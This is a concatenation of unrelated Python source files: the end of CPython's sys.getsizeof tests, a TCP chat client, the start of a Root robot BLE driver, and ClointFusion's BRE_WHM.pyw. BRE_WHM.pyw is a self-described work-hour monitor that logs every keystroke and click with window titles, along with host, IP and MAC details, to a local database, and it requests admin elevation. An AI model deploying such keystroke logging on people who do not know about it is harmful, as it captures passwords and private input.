self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipsis
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
localsplus = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees
check(x, vsize('8P3i3c' + localsplus*'P'))
# function
def func(): pass
check(func, size('14P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
BRE_WHM.pyw
|
#BOT Recommendation Engine and Work Hour Monitor
import sqlite3
import os
import sys
import datetime
import time
from dateutil import parser
from pathlib import Path
import PySimpleGUI as sg
import traceback
import platform,socket,re,uuid,json,logging
from pynput.mouse import Listener as MouseListener
from pynput.keyboard import Listener as KeyboardListener
from elevate import elevate
import pyinspect as pi
import pyautogui as pg
from ClointFusion import selft
import threading
user_uuid = selft.get_uuid()
pi.install_traceback(hide_locals=True,relevant_only=True,enable_prompt=True)
os_name = str(platform.system()).lower()
windows_os = "windows"
linux_os = "linux"
mac_os = "darwin"
if os_name == windows_os:
clointfusion_directory = r"C:\Users\{}\ClointFusion".format(str(os.getlogin()))
elif os_name == linux_os:
clointfusion_directory = r"/home/{}/ClointFusion".format(str(os.getlogin()))
elif os_name == mac_os:
clointfusion_directory = r"/Users/{}/ClointFusion".format(str(os.getlogin()))
img_folder_path = Path(os.path.join(clointfusion_directory, "Images"))
config_folder_path = Path(os.path.join(clointfusion_directory, "Config_Files"))
cf_splash_png_path = Path(os.path.join(clointfusion_directory,"Logo_Icons","Splash.PNG"))
cf_icon_cdt_file_path = os.path.join(clointfusion_directory,"Logo_Icons","Cloint-ICON-CDT.ico")
last_click = ""
COUNTER = 1
# elevate(show_console=False)
try:
db_file_path = os.path.join(str(config_folder_path), "BRE_WHM.db")
connct = sqlite3.connect(db_file_path,check_same_thread=False)
cursr = connct.cursor()
except: #Ask ADMIN Rights if REQUIRED
if os_name == windows_os:
elevate(show_console=False)
else:
elevate(graphical=False)
connct = sqlite3.connect(os.path.join(str(config_folder_path), "BRE_WHM.db"), check_same_thread=False)
cursr = connct.cursor()
# connct.execute("DROP TABLE SYS_CONFIG")
# connct.execute("DROP TABLE CFEVENTS")
# Creating table
sys_config_table = """ CREATE TABLE SYS_CONFIG (
uuid TEXT PRIMARY KEY NOT NULL,
platform TEXT NULL,
platform_release TEXT NULL,
platform_version TEXT NULL,
architecture TEXT NULL,
hostname TEXT NULL,
ip_addr TEXT NULL,
mac_addr TEXT NULL,
processor TEXT NULL
); """
try:
cursr.execute(sys_config_table)
cursr.execute("Insert into SYS_CONFIG values(?,?,?,?,?,?,?,?,?)", (user_uuid), str(platform.system()), str(platform.release()),str(platform.version()),str(platform.machine()),str(socket.gethostname()),str(socket.gethostbyname(socket.gethostname())),str(':'.join(re.findall('..', '%012x' % uuid.getnode()))),str(platform.processor()))
connct.commit()
except sqlite3.OperationalError:
pass
except Exception as ex :
print(f"Exception: {ex}")
try:
cursr.execute("ALTER TABLE SYS_CONFIG DROP COLUMN RAM")
connct.commit()
except:
pass
event_table = """ CREATE TABLE IF NOT EXISTS CFEVENTS (
TIME_STAMP TEXT NOT NULL,
Event_Name TEXT NULL,
X TEXT NULL,
Y TEXT NULL,
KEY TEXT NULL,
Button_Name TEXT NULL,
Click_Count TEXT NULL,
Window_Name TEXT NULL,
Mouse_RGB TEXT NULL,
SNIP_File_Path TEXT NULL
); """
cursr.execute(event_table)
connct.commit()
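# The CFEVENTS table above is what the "work report" mentioned later reads from.
# A minimal sketch (an assumption, not part of this script) of how the logged
# events could be inspected against the same database file:
#
#     import sqlite3
#     con = sqlite3.connect(db_file_path)  # same path created above
#     for row in con.execute(
#             "SELECT TIME_STAMP, Event_Name, Window_Name FROM CFEVENTS LIMIT 5"):
#         print(row)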
def get_time_stamp():
st = time.time()
ts = datetime.datetime.fromtimestamp(st).strftime('%Y-%m-%d %H:%M:%S')
return ts
def get_active_window():
"""
Get the currently active window.
Returns
-------
string :
Name of the currently active window.
"""
active_window_name = None
if sys.platform in ['linux', 'linux2']:
try:
import wnck
except ImportError:
print("wnck not installed")
wnck = None
if wnck is not None:
screen = wnck.screen_get_default()
screen.force_update()
window = screen.get_active_window()
if window is not None:
pid = window.get_pid()
with open("/proc/{pid}/cmdline".format(pid=pid)) as f:
active_window_name = f.read()
else:
try:
from gi.repository import Gtk, Wnck
gi = "Installed"
except ImportError:
print("gi.repository not installed")
gi = None
if gi is not None:
Gtk.init([]) # necessary if not using a Gtk.main() loop
screen = Wnck.Screen.get_default()
screen.force_update() # recommended per Wnck documentation
active_window = screen.get_active_window()
pid = active_window.get_pid()
with open("/proc/{pid}/cmdline".format(pid=pid)) as f:
active_window_name = f.read()
elif sys.platform in ['Windows', 'win32', 'cygwin']:
import win32gui
window = win32gui.GetForegroundWindow()
active_window_name = win32gui.GetWindowText(window)
elif sys.platform in ['Mac', 'darwin', 'os2', 'os2emx']:
from AppKit import NSWorkspace
active_window_name = (NSWorkspace.sharedWorkspace()
.activeApplication()['NSApplicationName'])
else:
print("sys.platform={platform} is unknown. Please report."
.format(platform=sys.platform))
return active_window_name
def on_release(key):
try:
try:
windw=str(get_active_window())
except:
windw = "unknown"
windw = str(windw)
if str(windw).strip() == "" or str(windw).strip() == "Program Manager":
windw = "Desktop"
# RGB color below cursor
try:
rgb_pixels = pg.pixel(*pg.position())
except:
rgb_pixels = "N/A"
cursr.execute("Insert into CFEVENTS values(?,?,?,?,?,?,?,?,?,?)", (str(get_time_stamp()),"Key Press",str(pg.position()[0]),str(pg.position()[1]),str(key),"N/A","N/A",str(windw).replace("*",""),str(rgb_pixels), "N/A"))
connct.commit()
except Exception as ex:
print("Error in on_press="+str(ex))
def on_press(key):
pass
def on_click(x, y, button, pressed):
global last_click
global COUNTER
click_count = 1
try:
if pressed:
pass
if not pressed:
if last_click:
button_lst = last_click.split("#")
if str(button) == "Button.left" and button_lst[0] == "Button.left":
difference = datetime.datetime.now() - parser.parse(button_lst[1])
if difference.total_seconds() < 0.2:  # a second left click within 200 ms counts as a double-click
click_count = 2
last_click = str(button) + "#" + str(datetime.datetime.now())
try:
windw = str(get_active_window())
except:
windw = "unknown"
if str(windw).strip() == "" or str(windw).strip() == "Program Manager":
windw = "Desktop"
# img=pg.screenshot()
# RGB color below cursor
try:
rgb_pixels = pg.pixel(x,y)
except:
rgb_pixels = "N/A"
#snip image
# try:
# img=img.crop((x-40,y-40,x+40,y+40))
# except:
# img=img.crop((x-30,y-30,x+30,y+30))
# outputStr = ''.join(e for e in windw if e.isalnum())
# snip_save_path = str(img_folder_path) + "\\" + str(COUNTER) + "-" + str(outputStr) + "-" + str(x) + "_" + str(y) + ".PNG"
snip_save_path = ""
# try:
# # img.save(snip_save_path)
# except:
# pass
#capture mini-screenshot
# screenshot_save_path = str(img_folder_path) + str(COUNTER) + "-" + str(windw) + "-" + str(x) + "_" + str(y) + "_SS.png"
# try:
# im = pg.screenshot(screenshot_save_path,region=(pg.position()[0]-150,pg.position()[1]-150,300, 300)) #mini screenshot
# except:
# pass
try:
cursr.execute("Insert into CFEVENTS values(?,?,?,?,?,?,?,?,?,?)", (get_time_stamp(),"Mouse Click",str(pg.position()[0]),str(pg.position()[1]),"N/A",str(button),str(click_count),str(windw).replace("*",""),str(rgb_pixels),str(snip_save_path)))
connct.commit()
except:
pass
COUNTER = COUNTER + 1
except Exception as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
print(exc_type)
print(exc_value)
print(exc_traceback)
print("Error in on_click="+str(ex))
def launch_cf_log_generator_gui():
keyboard_listener = KeyboardListener(on_release=on_release)
mouse_listener = MouseListener( on_click=on_click)
try:
cloint_small_logo_x_base64 = b'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'
sg.SetOptions(element_padding=(0,0), button_element_size=(10,1), auto_size_buttons=False)
layout = [[sg.Text("ClointFusion's Log Generator",font=('Helvetica', 10),text_color='Orange')],
[sg.Text("..running in background..",text_color='yellow')],
[sg.Text('', size=(8, 2), font=('Helvetica', 12), justification='center', key='text')],
[sg.Exit(button_text='Stop',button_color=('white', 'firebrick4'),key='Exit')]]
window = sg.Window('ClointFusion', layout, no_titlebar=True, auto_size_buttons=False, keep_on_top=True, grab_anywhere=True,element_justification='c',auto_close=False,use_default_focus=True,icon=cloint_small_logo_x_base64)
current_time = 0
paused = False
start_time = int(round(time.time() * 100))
keyboard_listener.start()
mouse_listener.start()
while True:
# --------- Read and update window --------
if not paused:
event, values = window.read(timeout=10)
current_time = int(round(time.time() * 100)) - start_time
else:
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Exit':
try:
keyboard_listener.stop()
mouse_listener.stop()
except:
pass
break
# --------- Display timer in window --------
window['text'].update('{:02d}:{:02d}'.format((current_time // 100) // 60,
(current_time // 100) % 60))
# window_show_desktop()
window.Close()
except Exception as ex:
print("Error in launch_cf_log_generator_gui="+str(ex))
# def pause():
# # pg.alert("RR")
# print("PAUSED")
def exit(keyboard_listener,mouse_listener):
try:
keyboard_listener.stop()
mouse_listener.stop()
os._exit(0)
except:
pass
def _getServerVersion():
global s_version
s_version = ""
try:
import requests  # not imported at module level, so import it here
response = requests.get('https://pypi.org/pypi/ClointFusion/json')
s_version = response.json()['info']['version']
except Exception:
pass
return s_version
def _getCurrentVersion():
global c_version
try:
if os_name == windows_os:
c_version = os.popen('pip show ClointFusion | findstr "Version"').read()
elif os_name == linux_os:
c_version = os.popen('pip3 show ClointFusion | grep "Version"').read()
c_version = str(c_version).split(":")[1].strip()
except:
pass
return c_version
def get_versions():
get_current_version_thread = threading.Thread(target=_getCurrentVersion, name="GetCurrentVersion")
get_current_version_thread.start()
get_server_version_thread = threading.Thread(target=_getServerVersion, name="GetServerVersion")
get_server_version_thread.start()
get_current_version_thread.join()
get_server_version_thread.join()
def _get_site_packages_path():
"""
Returns Site-Packages Path
"""
import subprocess
try:
import site
site_packages_path = next(p for p in site.getsitepackages() if 'site-packages' in p)
except:
site_packages_path = subprocess.run('python -c "import os; print(os.path.join(os.path.dirname(os.__file__), \'site-packages\'))"',capture_output=True, text=True).stdout
site_packages_path = str(site_packages_path).strip()
return str(site_packages_path)
def call_colab_launcher():
try:
cmd = f'python "{_get_site_packages_path()}\ClointFusion\Colab_Launcher.py"'
os.system(cmd)
except Exception as ex :
print("Error in call_colab_launcher" + str(ex))
def call_dost_client():
try:
cmd = f'python "{_get_site_packages_path()}\ClointFusion\DOST_CLIENT.pyw"'
os.system(cmd)
except Exception as ex :
print("Error in call_dost_client" + str(ex))
def call_bol():
try:
cmd = f'python "{_get_site_packages_path()}\ClointFusion\Bol.pyw"'
os.system(cmd)
except Exception as ex:
print("Error in call_bol " + str(ex))
def launch_cf_log_generator_gui_new():
try:
from pystray import Icon as icon, Menu as menu, MenuItem as item
from PIL import Image
import webbrowser
keyboard_listener = KeyboardListener(on_release=on_release)
mouse_listener = MouseListener( on_click=on_click)
keyboard_listener.start()
mouse_listener.start()
image = Image.open(cf_splash_png_path)
icon('ClointFusion', image, f"ClointFusion, Made in India with LOVE, version : {_getCurrentVersion()}",menu=menu(
item(
'About',
lambda icon, item: webbrowser.open_new("https://sites.google.com/view/clointfusion-hackathon")),
item(
'Colab Launcher',
lambda icon, item: call_colab_launcher()),
# lambda icon, item: webbrowser.open_new("https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb")),
item(
'Bol (Talk)',
lambda icon, item: call_bol()),
item(
'Dost Client',
lambda icon, item: call_dost_client()),
item(
'Work Report',
lambda icon, item: icon.notify("Hi, This is your work hour monitor powered by ClointFusion. Just open a command prompt and type 'work' to view the report")),
item(
'Exit',
lambda icon, item: exit(keyboard_listener,mouse_listener)))).run()
except Exception as ex:
print("Error in launch_cf_log_generator_gui_new="+str(ex))
try:
launch_cf_log_generator_gui_new()
except Exception as ex:
pg.alert(ex)
|
old_client.py
|
import socket
import threading
import sys
import os
import json
class Client:
# creates socket using TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# __init__ stores the ip address, port and session_url;
# run() connects to the server and sends the session_url
# so this client is added to the connections list
def __init__(self, address, port, session_url):
self.address = address
self.port = port
self.session_url = session_url
def run(self):
self.sock.connect((self.address, self.port))
print("Connected to socket lobby.")
self.sock.send(self.session_url.encode())
# start a thread for the client to broadcast over the lobby
iThread = threading.Thread(target=self.send_msg)
iThread.daemon = True
iThread.start()
# receives information from the server and prints
# it to stdout
while True:
data = self.sock.recv(1024)
if not data:
break
print(str(data, "utf-8"))
def send_msg(self):
while True:
# sends stdin to lobby to be broadcasted
self.sock.send(bytes(input(""), "utf-8"))
# if __name__ == "__main__":
#     Client("localhost", 10000, "<session_url>").run()
|
root.py
|
# External Dependencies
import threading
import time
from struct import pack, unpack
import queue
import numpy
# Internal Dependencies
from .packet import Packet
class Root(object):
"""Simplifies communication with a real Root robot.
Unless otherwise indicated, all methods are non-blocking.
Packets are sent to the robot and received in separate threads;
replies are interpreted when received and responses are placed
in internal class state variables.
Full descriptions of Root BLE packets can be found at
RootRobotics/root-robot-ble-protocol
"""
def __init__(self, phy):
"""Sets up data link layer for Root robot. Kicks off some threads
used to manage the connection, and uses initialize_state() to
populate some information about the robot into the class.
Parameters
----------
phy: RootPhy
Initialized RootPhy object. Used to pick physical layer.
"""
self._phy = phy
# do some check here to be sure phy is an initialized RootPhy object
try:
self._tx_q = queue.SimpleQueue()
except AttributeError:
self._tx_q = queue.Queue()
self._rx_q = self._phy.rx_q
self.pending_lock = threading.Lock()
self.pending_resp = []
"""list: List of responses pending from the robot."""
self.sniff_mode = False
"""bool: If True, shows the raw transactions to and from the robot."""
self.ignore_crc_errors = False
"""bool: If true, ignores CRC errors in packets from the robot."""
self.stop_project_flag = threading.Event()
"""Event: signals that Stop Project message was received."""
self.state = {}
"""dict: Contains local state of robot"""
self._last_coord = (0+0j)
"""complex: Contains last known coordinates of robot."""
self._last_theta_x10 = 900
"""int: Contains last known heading of robot."""
self.create_empty_state()
threading.Thread(target = self._sending_thread).start()
threading.Thread(target = self._receiving_thread).start()
threading.Thread(target = self._expiration_thread).start()
self.initialize_state()
def is_running(self):
"""Utility function for determining state of phy thread."""
return self._phy.is_connected()
def disconnect(self, timeout = 3):
"""Request disconnect from the robot and shut down connection.
Parameters
-------
timeout : float
Number of seconds to wait for all pending transmissions to
be sent before forcing the disconnect at the physical layer.
"""
self._tx_q.put((Packet(0, 6, 0), False))
t = time.time() + timeout
while time.time() < t and self.transmissions_pending():
time.sleep(0.1)
self._phy.disconnect()
def create_empty_state(self):
"""Set up internal state dictionary with all state set to None.
"""
for devnum, device in self.supported_devices.items():
self.state[device] = None
for devnum, device in self.virtual_devices.items():
self.state[device] = None
def initialize_state(self):
"""Initialize internal state dictionary.
Since certain versions of the main board protocol don't support
CRC properly, also request version information and set some
internal flags so that warnings are thrown appropriately.
"""
self.disable_events()
time.sleep(1) # not sure why this is necessary
self.get_versions(self.main_board)
self.get_versions(self.color_board)
timeout = time.time() + 5
blocked = True
while time.time() < timeout and blocked:
try:
if self.state['General'][self.main_board] < 1.011:
self.ignore_crc_errors = True
blocked = False
except TypeError:
time.sleep(0.1)
if blocked == True:
print('Warning: could not get main board version')
self.get_name()
self.get_serial_number()
self.get_battery_level()
self.enable_events()
#TODO: Use enums here and elsewhere
main_board = 0xA5
color_board = 0xC6
def get_versions(self, board):
"""Requests the firmware version of a particular board in the robot.
Parameters
----------
board : byte
Byte defining the board whose version is being requested.
For convenience, the following constants are defined:
* main_board
* color_board
"""
self._tx_q.put((Packet(0, 0, 0, payload=bytes([board])), True))
def set_name(self, name):
"""Sets the robot's name.
Parameters
----------
name : str
New name for the robot.
Returns
-------
utf_name : bytes
Actual name set for the robot, since the name requested may not fit.
Truncates the name if its UTF-8 representation is longer than 16 bytes.
Returns None if the name supplied cannot be converted.
"""
try:
utf_name = name.encode('utf-8')
while len(utf_name) > Packet.PAYLOAD_LEN:
name = name[:-1]
utf_name = name.encode('utf-8')
except AttributeError:
return None
if utf_name == b'':
utf_name = b'\x46\x4c\x45\x41'  # default payload when the requested name encodes to nothing
self._tx_q.put((Packet(0, 1, 0, payload=utf_name), False))
return utf_name
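# Illustrative only (assumes a constructed Root instance named `robot`): a
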